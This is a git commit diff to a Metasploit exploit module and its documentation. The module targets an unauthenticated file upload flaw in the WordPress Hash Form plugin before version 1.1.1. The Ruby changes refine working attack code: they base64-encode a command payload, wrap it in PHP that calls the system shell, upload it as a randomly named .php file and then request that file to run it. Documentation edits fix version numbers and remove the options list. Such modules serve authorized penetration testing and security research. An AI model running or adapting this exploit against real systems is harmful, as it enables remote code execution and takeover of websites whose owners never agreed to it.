Add suggestions

Chocapikk · Chocapikk · commit 6b127249fa64 · 2024-05-31T20:56:03.000+02:00
diff --git a/documentation/modules/exploit/multi/http/wp_hash_form_rce.md b/documentation/modules/exploit/multi/http/wp_hash_form_rce.md
@@ -1,18 +1,18 @@
 ## Vulnerable Application
 
 This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Hash Form
-plugin, versions prior to 1.11.
+plugin, versions prior to 1.1.1.
 The vulnerability is due to an unauthenticated file upload flaw in the plugin.
 To replicate a vulnerable environment for testing:
 
 1. Install WordPress.
-2. Download and install the Hash Form plugin, ensuring the version is below 1.11.
+2. Download and install the Hash Form plugin, ensuring the version is below 1.1.1.
 3. Verify that the plugin is activated and accessible on the local network.
 4. Create any form
 
 ## Verification Steps
 
-1. Set up a WordPress instance with the Hash Form plugin (version < 1.11).
+1. Set up a WordPress instance with the Hash Form plugin (version < 1.1.1).
 2. Launch `msfconsole` in your Metasploit framework.
 3. Use the module: `use exploit/multi/http/wp_hash_form_rce`.
 4. Set `RHOSTS` to the local IP address or hostname of the target.
@@ -22,39 +22,15 @@ To replicate a vulnerable environment for testing:
 
 ## Options
 
-This module offers several options:
-
-#### RHOSTS
-
-- **Description**: Target address or range of addresses.
-- **Required**: Yes.
-- **Default Value**: None (user must specify).
-
-#### RPORT
-
-- **Description**: Target port (TCP) for the WordPress application.
-- **Required**: Yes.
-- **Default Value**: 80.
-
-#### SSL
-
-- **Description**: Determines if SSL/TLS should be used.
-- **Required**: Yes.
-- **Default Value**: False.
-
-#### TARGETURI
-
-- **Description**: Base path of the WordPress application.
-- **Required**: Yes.
-- **Default Value**: `/`.
+No option
 
 ## Scenarios
 
 ### Successful Exploitation Against Local WordPress with Hash Form 1.10
 
 **Setup**:
 
-- Local WordPress instance with Hash Form version 1.10.
+- Local WordPress instance with Hash Form version 1.1.0.
 - Metasploit Framework.
 
 **Steps**:
@@ -64,9 +40,9 @@ This module offers several options:
 ```
 use exploit/multi/http/wp_hash_form_rce
 ```
-4. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
-5. Configure other necessary options (TARGETURI, SSL, etc.).
-6. Launch the exploit:
+3. Set `RHOSTS` to the local IP (e.g., 192.168.1.11).
+4. Configure other necessary options (TARGETURI, SSL, etc.).
+5. Launch the exploit:
 ```
 exploit
 ```
diff --git a/modules/exploits/multi/http/wp_hash_form_rce.rb b/modules/exploits/multi/http/wp_hash_form_rce.rb
@@ -6,8 +6,10 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Payload::Php
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::Wordpress
+
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -72,11 +74,15 @@ def check
     return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?
 
     plugin_check_code = check_plugin_version_from_readme('hash-form', '1.1.1')
-    return CheckCode::Unknown('Hash Form plugin does not appear to be installed.') unless plugin_check_code
-    return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == 'detected'
+
+    if plugin_check_code.code == CheckCode::Unknown.code
+      return CheckCode::Unknown('Hash Form plugin does not appear to be installed.')
+    end
+
+    return CheckCode::Detected('Hash Form plugin is installed but the version is unknown.') if plugin_check_code.code == CheckCode::Detected.code
 
     plugin_version = plugin_check_code.details[:version]
-    return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == 'appears'
+    return CheckCode::Safe("Hash Form plugin is version: #{plugin_version}, which is not vulnerable.") unless plugin_check_code.code == CheckCode::Appears.code
 
     print_good("Detected Hash Form plugin version: #{plugin_version}")
     CheckCode::Appears
@@ -111,15 +117,28 @@ def get_nonce
 
     return nil unless res && res.code == 200
 
-    script_content = res.body.match(%r{<script id="frontend-js-extra"[^>]*>([\s\S]*?)</script>})
-    return nil unless script_content && script_content[1]
+    script_content = res.get_html_document.xpath('//script[@id="frontend-js-extra"]').text
+    return nil unless script_content
 
-    nonce_match = script_content[1].match(/"ajax_nounce":"([a-f0-9]+)"/)
+    nonce_match = script_content.match(/"ajax_nounce":"([a-f0-9]+)"/)
     nonce_match ? nonce_match[1] : nil
   end
 
+  def php_exec_cmd(encoded_payload)
+    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+
+    shell = <<-END_OF_PHP_CODE
+      #{php_preamble(disabled_varname: dis)}
+      $c = base64_decode("#{encoded_clean_payload}");
+      #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+
+    return Rex::Text.compress(shell)
+  end
+
   def upload_php_file(nonce)
-    file_content = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    file_content = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
     file_name = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
 
     res = send_request_cgi({
@@ -144,7 +163,7 @@ def upload_php_file(nonce)
   end
 
   def trigger_payload(url)
-    print_status("Triggering the payload at #{url}...")
+    print_status('Triggering the payload...')
     uri = URI.parse(url)
     send_request_cgi({
       'method' => 'GET',
